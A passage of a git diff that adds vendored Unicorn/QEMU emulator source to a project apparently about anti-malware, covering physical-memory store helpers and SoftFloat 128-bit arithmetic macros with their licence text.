!memory_access_is_direct(mr, true)) { + io_mem_write(mr, addr1, val, 4); + } else { + addr1 += memory_region_get_ram_addr(mr) & TARGET_PAGE_MASK; + ptr = qemu_get_ram_ptr(as->uc, addr1); + stl_p(ptr, val); + } +} + +/* warning: addr must be aligned */ +static inline void stl_phys_internal(AddressSpace *as, + hwaddr addr, uint32_t val, + enum device_endian endian) +{ + uint8_t *ptr; + MemoryRegion *mr; + hwaddr l = 4; + hwaddr addr1; + + mr = address_space_translate(as, addr, &addr1, &l, + true); + if (l < 4 || !memory_access_is_direct(mr, true)) { +#if defined(TARGET_WORDS_BIGENDIAN) + if (endian == DEVICE_LITTLE_ENDIAN) { + val = bswap32(val); + } +#else + if (endian == DEVICE_BIG_ENDIAN) { + val = bswap32(val); + } +#endif + io_mem_write(mr, addr1, val, 4); + } else { + /* RAM case */ + addr1 += memory_region_get_ram_addr(mr) & TARGET_PAGE_MASK; + ptr = qemu_get_ram_ptr(as->uc, addr1); + switch (endian) { + case DEVICE_LITTLE_ENDIAN: + stl_le_p(ptr, val); + break; + case DEVICE_BIG_ENDIAN: + stl_be_p(ptr, val); + break; + default: + stl_p(ptr, val); + break; + } + invalidate_and_set_dirty(mr->uc, addr1, 4); + } +} + +void stl_phys(AddressSpace *as, hwaddr addr, uint32_t val) +{ + stl_phys_internal(as, addr, val, DEVICE_NATIVE_ENDIAN); +} + +void stl_le_phys(AddressSpace *as, hwaddr addr, uint32_t val) +{ + stl_phys_internal(as, addr, val, DEVICE_LITTLE_ENDIAN); +} + +void stl_be_phys(AddressSpace *as, hwaddr addr, uint32_t val) +{ + stl_phys_internal(as, addr, val, DEVICE_BIG_ENDIAN); +} + +/* XXX: optimize */ +void stb_phys(AddressSpace *as, hwaddr addr, uint32_t val) +{ + uint8_t v = val; + address_space_rw(as, addr, &v, 1, 1); +} + +/* warning: addr must be aligned */ +static inline void stw_phys_internal(AddressSpace *as, + hwaddr addr, uint32_t val, + enum device_endian endian) +{ + uint8_t *ptr; + MemoryRegion *mr; + hwaddr l = 2; + hwaddr addr1; + + mr = address_space_translate(as, addr, &addr1, &l, true); + if (l < 2 || !memory_access_is_direct(mr, true)) { +#if defined(TARGET_WORDS_BIGENDIAN) + if (endian == DEVICE_LITTLE_ENDIAN) { + val = bswap16(val); + } +#else + if (endian == DEVICE_BIG_ENDIAN) { + val = bswap16(val); + } +#endif + io_mem_write(mr, addr1, val, 2); + } else { + /* RAM case */ + addr1 += memory_region_get_ram_addr(mr) & TARGET_PAGE_MASK; + ptr = qemu_get_ram_ptr(as->uc, addr1); + switch (endian) { + case DEVICE_LITTLE_ENDIAN: + stw_le_p(ptr, val); + break; + case DEVICE_BIG_ENDIAN: + stw_be_p(ptr, val); + break; + default: + stw_p(ptr, val); + break; + } + invalidate_and_set_dirty(as->uc, addr1, 2); + } +} + +void stw_phys(AddressSpace *as, hwaddr addr, uint32_t val) +{ + stw_phys_internal(as, addr, val, DEVICE_NATIVE_ENDIAN); +} + +void stw_le_phys(AddressSpace *as, hwaddr addr, uint32_t val) +{ + stw_phys_internal(as, addr, val, DEVICE_LITTLE_ENDIAN); +} + +void stw_be_phys(AddressSpace *as, hwaddr addr, uint32_t val) +{ + stw_phys_internal(as, addr, val, DEVICE_BIG_ENDIAN); +} + +/* XXX: optimize */ +void stq_phys(AddressSpace *as, hwaddr addr, uint64_t val) +{ + val = tswap64(val); + address_space_rw(as, addr, (void *) &val, 8, 1); +} + +void stq_le_phys(AddressSpace *as, hwaddr addr, uint64_t val) +{ + val = cpu_to_le64(val); + address_space_rw(as, addr, (void *) &val, 8, 1); +} + +void stq_be_phys(AddressSpace *as, hwaddr addr, uint64_t val) +{ + val = cpu_to_be64(val); + address_space_rw(as, addr, (void *) &val, 8, 1); +} + +/* virtual memory access for debug (includes writing to ROM) */ +int cpu_memory_rw_debug(CPUState *cpu, target_ulong addr, + uint8_t *buf, int len, int is_write) +{ + int l; + hwaddr phys_addr; + target_ulong page; + + while (len > 0) { + page = addr & TARGET_PAGE_MASK; + phys_addr = cpu_get_phys_page_debug(cpu, page); + /* if no physical page mapped, return an error */ + if (phys_addr == -1) + return -1; + l = (page + TARGET_PAGE_SIZE) - addr; + if (l > len) + l = len; + phys_addr += (addr & ~TARGET_PAGE_MASK); + if (is_write) { + cpu_physical_memory_write_rom(cpu->as, phys_addr, buf, l); + } else { + address_space_rw(cpu->as, phys_addr, buf, l, 0); + } + len -= l; + buf += l; + addr += l; + } + return 0; +} +#endif + +/* + * A helper function for the _utterly broken_ virtio device model to find out if + * it's running on a big endian machine. Don't do this at home kids! + */ +bool target_words_bigendian(void); +bool target_words_bigendian(void) +{ +#if defined(TARGET_WORDS_BIGENDIAN) + return true; +#else + return false; +#endif +} + +#ifndef CONFIG_USER_ONLY +bool cpu_physical_memory_is_io(AddressSpace *as, hwaddr phys_addr) +{ + MemoryRegion*mr; + hwaddr l = 1; + + mr = address_space_translate(as, phys_addr, &phys_addr, &l, false); + + return !(memory_region_is_ram(mr) || + memory_region_is_romd(mr)); +} + +void qemu_ram_foreach_block(struct uc_struct *uc, RAMBlockIterFunc func, void *opaque) +{ + RAMBlock *block; + + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + func(block->host, block->offset, block->length, opaque); + } +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/fpu/softfloat-macros.h b/ai_anti_malware/unicorn/unicorn-master/qemu/fpu/softfloat-macros.h new file mode 100644 index 0000000..2892b4f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/fpu/softfloat-macros.h @@ -0,0 +1,749 @@ +/* + * QEMU float support macros + * + * Derived from SoftFloat. + */ + +/*============================================================================ + +This C source fragment is part of the SoftFloat IEC/IEEE Floating-point +Arithmetic Package, Release 2b. + +Written by John R. Hauser. This work was made possible in part by the +International Computer Science Institute, located at Suite 600, 1947 Center +Street, Berkeley, California 94704. Funding was partially provided by the +National Science Foundation under grant MIP-9311980. The original version +of this code was written as part of a project to build a fixed-point vector +processor in collaboration with the University of California at Berkeley, +overseen by Profs. Nelson Morgan and John Wawrzynek. More information +is available through the Web page `http://www.cs.berkeley.edu/~jhauser/ +arithmetic/SoftFloat.html'. + +THIS SOFTWARE IS DISTRIBUTED AS IS, FOR FREE. Although reasonable effort has +been made to avoid it, THIS SOFTWARE MAY CONTAIN FAULTS THAT WILL AT TIMES +RESULT IN INCORRECT BEHAVIOR. USE OF THIS SOFTWARE IS RESTRICTED TO PERSONS +AND ORGANIZATIONS WHO CAN AND WILL TAKE FULL RESPONSIBILITY FOR ALL LOSSES, +COSTS, OR OTHER PROBLEMS THEY INCUR DUE TO THE SOFTWARE, AND WHO FURTHERMORE +EFFECTIVELY INDEMNIFY JOHN HAUSER AND THE INTERNATIONAL COMPUTER SCIENCE +INSTITUTE (possibly via similar legal notice) AGAINST ALL LOSSES, COSTS, OR +OTHER PROBLEMS INCURRED BY THEIR CUSTOMERS AND CLIENTS DUE TO THE SOFTWARE. + +Derivative works are acceptable, even for commercial purposes, so long as +(1) the source code for the derivative work includes prominent notice that +the work is derivative, and (2) the source code includes prominent notice with +these four paragraphs for those parts of this code that are retained. + +=============================================================================*/ + +/*---------------------------------------------------------------------------- +| This macro tests for minimum version of the GNU C compiler. +*----------------------------------------------------------------------------*/ +#if defined(__GNUC__) && defined(__GNUC_MINOR__) +# define SOFTFLOAT_GNUC_PREREQ(maj, min) \ + ((__GNUC__ << 16) + __GNUC_MINOR__ >= ((maj) << 16) + (min)) +#else +# define SOFTFLOAT_GNUC_PREREQ(maj, min) 0 +#endif + + +/*---------------------------------------------------------------------------- +| Shifts `a' right by the number of bits given in `count'. If any nonzero +| bits are shifted off, they are ``jammed'' into the least significant bit of +| the result by setting the least significant bit to 1. The value of `count' +| can be arbitrarily large; in particular, if `count' is greater than 32, the +| result will be either 0 or 1, depending on whether `a' is zero or nonzero. +| The result is stored in the location pointed to by `zPtr'. +*----------------------------------------------------------------------------*/ + +static inline void shift32RightJamming(uint32_t a, int_fast16_t count, uint32_t *zPtr) +{ + uint32_t z; + + if ( count == 0 ) { + z = a; + } + else if ( count < 32 ) { + z = ( a>>count ) | ( ( a<<( ( - count ) & 31 ) ) != 0 ); + } + else { + z = ( a != 0 ); + } + *zPtr = z; + +} + +/*---------------------------------------------------------------------------- +| Shifts `a' right by the number of bits given in `count'. If any nonzero +| bits are shifted off, they are ``jammed'' into the least significant bit of +| the result by setting the least significant bit to 1. The value of `count' +| can be arbitrarily large; in particular, if `count' is greater than 64, the +| result will be either 0 or 1, depending on whether `a' is zero or nonzero. +| The result is stored in the location pointed to by `zPtr'. +*----------------------------------------------------------------------------*/ + +static inline void shift64RightJamming(uint64_t a, int_fast16_t count, uint64_t *zPtr) +{ + uint64_t z; + + if ( count == 0 ) { + z = a; + } + else if ( count < 64 ) { + z = ( a>>count ) | ( ( a<<( ( - count ) & 63 ) ) != 0 ); + } + else { + z = ( a != 0 ); + } + *zPtr = z; + +} + +/*---------------------------------------------------------------------------- +| Shifts the 128-bit value formed by concatenating `a0' and `a1' right by 64 +| _plus_ the number of bits given in `count'. The shifted result is at most +| 64 nonzero bits; this is stored at the location pointed to by `z0Ptr'. The +| bits shifted off form a second 64-bit result as follows: The _last_ bit +| shifted off is the most-significant bit of the extra result, and the other +| 63 bits of the extra result are all zero if and only if _all_but_the_last_ +| bits shifted off were all zero. This extra result is stored in the location +| pointed to by `z1Ptr'. The value of `count' can be arbitrarily large. +| (This routine makes more sense if `a0' and `a1' are considered to form +| a fixed-point value with binary point between `a0' and `a1'. This fixed- +| point value is shifted right by the number of bits given in `count', and +| the integer part of the result is returned at the location pointed to by +| `z0Ptr'. The fractional part of the result may be slightly corrupted as +| described above, and is returned at the location pointed to by `z1Ptr'.) +*----------------------------------------------------------------------------*/ + +static inline void + shift64ExtraRightJamming( + uint64_t a0, uint64_t a1, int_fast16_t count, uint64_t *z0Ptr, uint64_t *z1Ptr) +{ + uint64_t z0, z1; + int8 negCount = ( - count ) & 63; + + if ( count == 0 ) { + z1 = a1; + z0 = a0; + } + else if ( count < 64 ) { + z1 = ( a0<<negCount ) | ( a1 != 0 ); + z0 = a0>>count; + } + else { + if ( count == 64 ) { + z1 = a0 | ( a1 != 0 ); + } + else { + z1 = ( ( a0 | a1 ) != 0 ); + } + z0 = 0; + } + *z1Ptr = z1; + *z0Ptr = z0; + +} + +/*---------------------------------------------------------------------------- +| Shifts the 128-bit value formed by concatenating `a0' and `a1' right by the +| number of bits given in `count'. Any bits shifted off are lost. The value +| of `count' can be arbitrarily large; in particular, if `count' is greater +| than 128, the result will be 0. The result is broken into two 64-bit pieces +| which are stored at the locations pointed to by `z0Ptr' and `z1Ptr'. +*----------------------------------------------------------------------------*/ + +static inline void + shift128Right( + uint64_t a0, uint64_t a1, int_fast16_t count, uint64_t *z0Ptr, uint64_t *z1Ptr) +{ + uint64_t z0, z1; + int8 negCount = ( - count ) & 63; + + if ( count == 0 ) { + z1 = a1; + z0 = a0; + } + else if ( count < 64 ) { + z1 = ( a0<<negCount ) | ( a1>>count ); + z0 = a0>>count; + } + else { + z1 = (count < 128) ? (a0 >> (count & 63)) : 0; + z0 = 0; + } + *z1Ptr = z1; + *z0Ptr = z0; + +} + +/*---------------------------------------------------------------------------- +| Shifts the 128-bit value formed by concatenating `a0' and `a1' right by the +| number of bits given in `count'. If any nonzero bits are shifted off, they +| are ``jammed'' into the least significant bit of the result by setting the +| least significant bit to 1. The value of `count' can be arbitrarily large; +| in particular, if `count' is greater than 128, the result will be either +| 0 or 1, depending on whether the concatenation of `a0' and `a1' is zero or +| nonzero. The result is broken into two 64-bit pieces which are stored at +| the locations pointed to by `z0Ptr' and `z1Ptr'. +*----------------------------------------------------------------------------*/ + +static inline void + shift128RightJamming( + uint64_t a0, uint64_t a1, int_fast16_t count, uint64_t *z0Ptr, uint64_t *z1Ptr) +{ + uint64_t z0, z1; + int8 negCount = ( - count ) & 63; + + if ( count == 0 ) { + z1 = a1; + z0 = a0; + } + else if ( count < 64 ) { + z1 = ( a0<<negCount ) | ( a1>>count ) | ( ( a1<<negCount ) != 0 ); + z0 = a0>>count; + } + else { + if ( count == 64 ) { + z1 = a0 | ( a1 != 0 ); + } + else if ( count < 128 ) { + z1 = ( a0>>( count & 63 ) ) | ( ( ( a0<<negCount ) | a1 ) != 0 ); + } + else { + z1 = ( ( a0 | a1 ) != 0 ); + } + z0 = 0; + } + *z1Ptr = z1; + *z0Ptr = z0; + +} + +/*---------------------------------------------------------------------------- +| Shifts the 192-bit value formed by concatenating `a0', `a1', and `a2' right +| by 64 _plus_ the number of bits given in `count'. The shifted result is +| at most 128 nonzero bits; these are broken into two 64-bit pieces which are +| stored at the locations pointed to by `z0Ptr' and `z1Ptr'. The bits shifted +| off form a third 64-bit result as follows: The _last_ bit shifted off is +| the most-significant bit of the extra result, and the other 63 bits of the +| extra result are all zero if and only if _all_but_the_last_ bits shifted off +| were all zero. This extra result is stored in the location pointed to by +| `z2Ptr'. The value of `count' can be arbitrarily large. +| (This routine makes more sense if `a0', `a1', and `a2' are considered +| to form a fixed-point value with binary point between `a1' and `a2'. This +| fixed-point value is shifted right by the number of bits given in `count', +| and the integer part of the result is returned at the locations pointed to +| by `z0Ptr' and `z1Ptr'. The fractional part of the result may be slightly +| corrupted as described above, and is returned at the location pointed to by +| `z2Ptr'.) +*----------------------------------------------------------------------------*/ + +static inline void + shift128ExtraRightJamming( + uint64_t a0, + uint64_t a1, + uint64_t a2, + int_fast16_t count, + uint64_t *z0Ptr, + uint64_t *z1Ptr, + uint64_t *z2Ptr + ) +{ + uint64_t z0, z1, z2; + int8 negCount = ( - count ) & 63; + + if ( count == 0 ) { + z2 = a2; + z1 = a1; + z0 = a0; + } + else { + if ( count < 64 ) { + z2 = a1<<negCount; + z1 = ( a0<<negCount ) | ( a1>>count ); + z0 = a0>>count; + } + else { + if ( count == 64 ) { + z2 = a1; + z1 = a0; + } + else { + a2 |= a1; + if ( count < 128 ) { + z2 = a0<<negCount; + z1 = a0>>( count & 63 ); + } + else { + z2 = ( count == 128 ) ? a0 : ( a0 != 0 ); + z1 = 0; + } + } + z0 = 0; + } + z2 |= ( a2 != 0 ); + } + *z2Ptr = z2; + *z1Ptr = z1; + *z0Ptr = z0; + +} + +/*---------------------------------------------------------------------------- +| Shifts the 128-bit value formed by concatenating `a0' and `a1' left by the +| number of bits given in `count'. Any bits shifted off are lost. The value +| of `count' must be less than 64. The result is broken into two 64-bit +| pieces which are stored at the locations pointed to by `z0Ptr' and `z1Ptr'. +*----------------------------------------------------------------------------*/ + +static inline void + shortShift128Left( + uint64_t a0, uint64_t a1, int_fast16_t count, uint64_t *z0Ptr, uint64_t *z1Ptr) +{ + + *z1Ptr = a1<<(count & 0x3f); + *z0Ptr = + ( count == 0 ) ? a0 : ( a0<<(count & 0x3f) ) | ( a1>>( ( - count ) & 63 ) ); + +} + +/*---------------------------------------------------------------------------- +| Shifts the 192-bit value formed by concatenating `a0', `a1', and `a2' left +| by the number of bits given in `count'. Any bits shifted off are lost. +| The value of `count' must be less than 64. The result is broken into three +| 64-bit pieces which are stored at the locations pointed to by `z0Ptr', +| `z1Ptr', and `z2Ptr'. +*----------------------------------------------------------------------------*/ + +static inline void + shortShift192Left( + uint64_t a0, + uint64_t a1, + uint64_t a2, + int_fast16_t count, + uint64_t *z0Ptr, + uint64_t *z1Ptr, + uint64_t *z2Ptr + ) +{ + uint64_t z0, z1, z2; + int8 negCount; + + z2 = a2<<count; + z1 = a1<<count; + z0 = a0<<count; + if ( 0 < count ) { + negCount = ( ( - count ) & 63 ); + z1 |= a2>>negCount; + z0 |= a1>>negCount; + } + *z2Ptr = z2; + *z1Ptr = z1; + *z0Ptr = z0; + +} + +/*---------------------------------------------------------------------------- +| Adds the 128-bit value formed by concatenating `a0' and `a1' to the 128-bit +| value formed by concatenating `b0' and `b1'. Addition is modulo 2^128, so +| any carry out is lost. The result is broken into two 64-bit pieces which +| are stored at the locations pointed to by `z0Ptr' and `z1Ptr'. +*----------------------------------------------------------------------------*/ + +static inline void + add128( + uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1, uint64_t *z0Ptr, uint64_t *z1Ptr ) +{ + uint64_t z1; + + z1 = a1 + b1; + *z1Ptr = z1; + *z0Ptr = a0 + b0 + ( z1 < a1 ); + +} + +/*---------------------------------------------------------------------------- +| Adds the 192-bit value formed by concatenating `a0', `a1', and `a2' to the +| 192-bit value formed by concatenating `b0', `b1', and `b2'. Addition is +| modulo 2^192, so any carry out is lost. The result is broken into three +| 64-bit pieces which are stored at the locations pointed to by `z0Ptr', +| `z1Ptr', and `z2Ptr'. +*----------------------------------------------------------------------------*/ + +static inline void + add192( + uint64_t a0, + uint64_t a1, + uint64_t a2, + uint64_t b0, + uint64_t b1, + uint64_t b2, + uint64_t *z0Ptr, + uint64_t *z1Ptr, + uint64_t *z2Ptr + ) +{ + uint64_t z0, z1, z2; + int8 carry0, carry1; + + z2 = a2 + b2; + carry1 = ( z2 < a2 ); + z1 = a1 + b1; + carry0 = ( z1 < a1 ); + z0 = a0 + b0; + z1 += carry1; + z0 += ( z1 < carry1 ); + z0 += carry0; + *z2Ptr = z2; + *z1Ptr = z1; + *z0Ptr = z0; + +} + +/*---------------------------------------------------------------------------- +| Subtracts the 128-bit value formed by concatenating `b0' and `b1' from the +| 128-bit value formed by concatenating `a0' and `a1'. Subtraction is modulo +| 2^128, so any borrow out (carry out) is lost. The result is broken into two +| 64-bit pieces which are stored at the locations pointed to by `z0Ptr' and +| `z1Ptr'. +*----------------------------------------------------------------------------*/ + +static inline void + sub128( + uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1, uint64_t *z0Ptr, uint64_t *z1Ptr ) +{ + + *z1Ptr = a1 - b1; + *z0Ptr = a0 - b0 - ( a1 < b1 ); + +} + +/*---------------------------------------------------------------------------- +| Subtracts the 192-bit value formed by concatenating `b0', `b1', and `b2' +| from the 192-bit value formed by concatenating `a0', `a1', and `a2'. +| Subtraction is modulo 2^192, so any borrow out (carry out) is lost. The +| result is broken into three 64-bit pieces which are stored at the locations +| pointed to by `z0Ptr', `z1Ptr', and `z2Ptr'. +*----------------------------------------------------------------------------*/ + +static inline void + sub192( + uint64_t a0, + uint64_t a1, + uint64_t a2, + uint64_t b0, + uint64_t b1, + uint64_t b2, + uint64_t *z0Ptr, + uint64_t *z1Ptr, + uint64_t *z2Ptr + ) +{ + uint64_t z0, z1, z2; + int8 borrow0, borrow1; + + z2 = a2 - b2; + borrow1 = ( a2 < b2 ); + z1 = a1 - b1; + borrow0 = ( a1 < b1 ); + z0 = a0 - b0; + z0 -= ( z1 < borrow1 ); + z1 -= borrow1; + z0 -= borrow0; + *z2Ptr = z2; + *z1Ptr = z1; + *z0Ptr = z0; + +} + +/*---------------------------------------------------------------------------- +| Multiplies `a' by `b' to obtain a 128-bit product. The product is broken +| into two 64-bit pieces which are stored at the locations pointed to by +| `z0Ptr' and `z1Ptr'. +*----------------------------------------------------------------------------*/ + +static inline void mul64To128( uint64_t a, uint64_t b, uint64_t *z0Ptr, uint64_t *z1Ptr ) +{ + uint32_t aHigh, aLow, bHigh, bLow; + uint64_t z0, zMiddleA, zMiddleB, z1; + + aLow = (uint32_t)a; + aHigh = a>>32; + bLow = (uint32_t)b; + bHigh = b>>32; + z1 = ( (uint64_t) aLow ) * bLow; + zMiddleA = ( (uint64_t) aLow ) * bHigh; + zMiddleB = ( (uint64_t) aHigh ) * bLow; + z0 = ( (uint64_t) aHigh ) * bHigh; + zMiddleA += zMiddleB; + z0 += ( ( (uint64_t) ( zMiddleA < zMiddleB ) )<<32 ) + ( zMiddleA>>32 ); + zMiddleA <<= 32; + z1 += zMiddleA; + z0 += ( z1 < zMiddleA ); + *z1Ptr = z1; + *z0Ptr = z0; + +} + +/*---------------------------------------------------------------------------- +| Multiplies the 128-bit value formed by concatenating `a0' and `a1' by +| `b' to obtain a 192-bit product. The product is broken into three 64-bit +| pieces which are stored at the locations pointed to by `z0Ptr', `z1Ptr', and +| `z2Ptr'. +*----------------------------------------------------------------------------*/ + +static inline void + mul128By64To192( + uint64_t a0, + uint64_t a1, + uint64_t b, + uint64_t *z0Ptr, + uint64_t *z1Ptr, + uint64_t *z2Ptr + ) +{ + uint64_t z0, z1, z2, more1; + + mul64To128( a1, b, &z1, &z2 ); + mul64To128( a0, b, &z0, &more1 ); + add128( z0, more1, 0, z1, &z0, &z1 ); + *z2Ptr = z2; + *z1Ptr = z1; + *z0Ptr = z0; + +} + +/*---------------------------------------------------------------------------- +| Multiplies the 128-bit value formed by concatenating `a0' and `a1' to the +| 128-bit value formed by concatenating `b0' and `b1' to obtain a 256-bit +| product. The product is broken into four 64-bit pieces which are stored at +| the locations pointed to by `z0Ptr', `z1Ptr', `z2Ptr', and `z3Ptr'. +*----------------------------------------------------------------------------*/ + +static inline void + mul128To256( + uint64_t a0, + uint64_t a1, + uint64_t b0, + uint64_t b1, + uint64_t *z0Ptr, + uint64_t *z1Ptr, + uint64_t *z2Ptr, + uint64_t *z3Ptr + ) +{ + uint64_t z0, z1, z2, z3; + uint64_t more1, more2; + + mul64To128( a1, b1, &z2, &z3 ); + mul64To128( a1, b0, &z1, &more2 ); + add128( z1, more2, 0, z2, &z1, &z2 ); + mul64To128( a0, b0, &z0, &more1 ); + add128( z0, more1, 0, z1, &z0, &z1 ); + mul64To128( a0, b1, &more1, &more2 ); + add128( more1, more2, 0, z2, &more1, &z2 ); + add128( z0, z1, 0, more1, &z0, &z1 ); + *z3Ptr = z3; + *z2Ptr = z2; + *z1Ptr = z1; + *z0Ptr = z0; + +} + +/*---------------------------------------------------------------------------- +| Returns an approximation to the 64-bit integer quotient obtained by dividing +| `b' into the 128-bit value formed by concatenating `a0' and `a1'. The +| divisor `b' must be at least 2^63. If q is the exact quotient truncated +| toward zero, the approximation returned lies between q and q + 2 inclusive. +| If the exact quotient q is larger than 64 bits, the maximum positive 64-bit +| unsigned integer is returned. +*----------------------------------------------------------------------------*/ + +static uint64_t estimateDiv128To64( uint64_t a0, uint64_t a1, uint64_t b ) +{ + uint64_t b0, b1; + uint64_t rem0, rem1, term0, term1; + uint64_t z; + + if ( b <= a0 ) return LIT64( 0xFFFFFFFFFFFFFFFF ); + b0 = b>>32; + z = ( b0<<32 <= a0 ) ? LIT64( 0xFFFFFFFF00000000 ) : ( a0 / b0 )<<32; + mul64To128( b, z, &term0, &term1 ); + sub128( a0, a1, term0, term1, &rem0, &rem1 ); + while ( ( (int64_t) rem0 ) < 0 ) { + z -= LIT64( 0x100000000 ); + b1 = b<<32; + add128( rem0, rem1, b0, b1, &rem0, &rem1 ); + } + rem0 = ( rem0<<32 ) | ( rem1>>32 ); + z |= ( b0<<32 <= rem0 ) ? 0xFFFFFFFF : rem0 / b0; + return z; + +} + +/*---------------------------------------------------------------------------- +| Returns an approximation to the square root of the 32-bit significand given +| by `a'. Considered as an integer, `a' must be at least 2^31. If bit 0 of +| `aExp' (the least significant bit) is 1, the integer returned approximates +| 2^31*sqrt(`a'/2^31), where `a' is considered an integer. If bit 0 of `aExp' +| is 0, the integer returned approximates 2^31*sqrt(`a'/2^30). In either +| case, the approximation returned lies strictly within +/-2 of the exact +| value. +*----------------------------------------------------------------------------*/ + +static uint32_t estimateSqrt32(int_fast16_t aExp, uint32_t a) +{ + static const uint16_t sqrtOddAdjustments[] = { + 0x0004, 0x0022, 0x005D, 0x00B1, 0x011D, 0x019F, 0x0236, 0x02E0, + 0x039C, 0x0468, 0x0545, 0x0631, 0x072B, 0x0832, 0x0946, 0x0A67 + }; + static const uint16_t sqrtEvenAdjustments[] = { + 0x0A2D, 0x08AF, 0x075A, 0x0629, 0x051A, 0x0429, 0x0356, 0x029E, + 0x0200, 0x0179, 0x0109, 0x00AF, 0x0068, 0x0034, 0x0012, 0x0002 + }; + int8 index; + uint32_t z; + + index = ( a>>27 ) & 15; + if ( aExp & 1 ) { + z = 0x4000 + ( a>>17 ) - sqrtOddAdjustments[ (int)index ]; + z = ( ( a / z )<<14 ) + ( z<<15 ); + a >>= 1; + } + else { + z = 0x8000 + ( a>>17 ) - sqrtEvenAdjustments[ (int)index ]; + z = a / z + z; + z = ( 0x20000 <= z ) ? 0xFFFF8000 : ( z<<15 ); + if ( z <= a ) return (uint32_t) ( ( (int32_t) a )>>1 ); + } + return ( (uint32_t) ( ( ( (uint64_t) a )<<31 ) / z ) ) + ( z>>1 ); + +} + +/*---------------------------------------------------------------------------- +| Returns the number of leading 0 bits before the most-significant 1 bit of +| `a'. If `a' is zero, 32 is returned. +*----------------------------------------------------------------------------*/ + +static int8 countLeadingZeros32( uint32_t a ) +{ +#if SOFTFLOAT_GNUC_PREREQ(3, 4) + if (a) { + return __builtin_clz(a); + } else { + return 32; + } +#else + static const int8 countLeadingZerosHigh[] = { + 8, 7, 6, 6, 5, 5, 5, 5, 4, 4, 4, 4, 4, 4, 4, 4, + 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, + 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, + 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, + 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, + 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 + }; + int8 shiftCount; + + shiftCount = 0; + if ( a < 0x10000 ) { + shiftCount += 16; + a <<= 16; + } + if ( a < 0x1000000 ) { + shiftCount += 8; + a <<= 8; + } + shiftCount += countLeadingZerosHigh[ a>>24 ]; + return shiftCount; +#endif +} + +/*---------------------------------------------------------------------------- +| Returns the number of leading 0 bits before the most-significant 1 bit of +| `a'. If `a' is zero, 64 is returned. +*----------------------------------------------------------------------------*/ + +static int8 countLeadingZeros64( uint64_t a ) +{ +#if SOFTFLOAT_GNUC_PREREQ(3, 4) + if (a) { + return __builtin_clzll(a); + } else { + return 64; + } +#else + int8 shiftCount; + + shiftCount = 0; + if ( a < ( (uint64_t) 1 )<<32 ) { + shiftCount += 32; + } + else { + a >>= 32; + } + shiftCount += countLeadingZeros32( (uint32_t)a ); + return shiftCount; +#endif +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the 128-bit value formed by concatenating `a0' and `a1' +| is equal to the 128-bit value formed by concatenating `b0' and `b1'. +| Otherwise, returns 0. +*----------------------------------------------------------------------------*/ + +static inline flag eq128( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1 ) +{ + + return ( a0 == b0 ) && ( a1 == b1 ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the 128-bit value formed by concatenating `a0' and `a1' is less +| than or equal to the 128-bit value formed by concatenating `b0' and `b1'. +| Otherwise, returns 0. +*----------------------------------------------------------------------------*/ + +static inline flag le128( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1 ) +{ + + return ( a0 < b0 ) || ( ( a0 == b0 ) && ( a1 <= b1 ) ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the 128-bit value formed by concatenating `a0' and `a1' is less +| than the 128-bit value formed by concatenating `b0' and `b1'. Otherwise, +| returns 0. +*----------------------------------------------------------------------------*/ + +static inline flag lt128( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1 ) +{ + + return ( a0 < b0 ) || ( ( a0 == b0 ) && ( a1 < b1 ) ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the 128-bit value formed by concatenating `a0' and `a1' is +| not equal to the 128-bit value formed by concatenating `b0' and `b1'. +| Otherwise, returns 0. +*----------------------------------------------------------------------------*/ + +static inline flag ne128( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1 ) +{ + + return ( a0 != b0 ) || ( a1 != b1 ); + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/fpu/softfloat-specialize.h b/ai_anti_malware/unicorn/unicorn-master/qemu/fpu/softfloat-specialize.h new file mode 100644 index 0000000..549b425 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/fpu/softfloat-specialize.h @@ -0,0 +1,1161 @@ +/* + * QEMU float support + * + * Derived from SoftFloat. + */ + +/*============================================================================ + +This C source fragment is part of the SoftFloat IEC/IEEE Floating-point +Arithmetic Package, Release 2b. + +Written by John R. Hauser. This work was made possible in part by the +International Computer Science Institute, located at Suite 600, 1947 Center +Street, Berkeley, California 94704. Funding was partially provided by the +National Science Foundation under grant MIP-9311980. The original version +of this code was written as part of a project to build a fixed-point vector +processor in collaboration with the University of California at Berkeley, +overseen by Profs. Nelson Morgan and John Wawrzynek. More information +is available through the Web page `http://www.cs.berkeley.edu/~jhauser/ 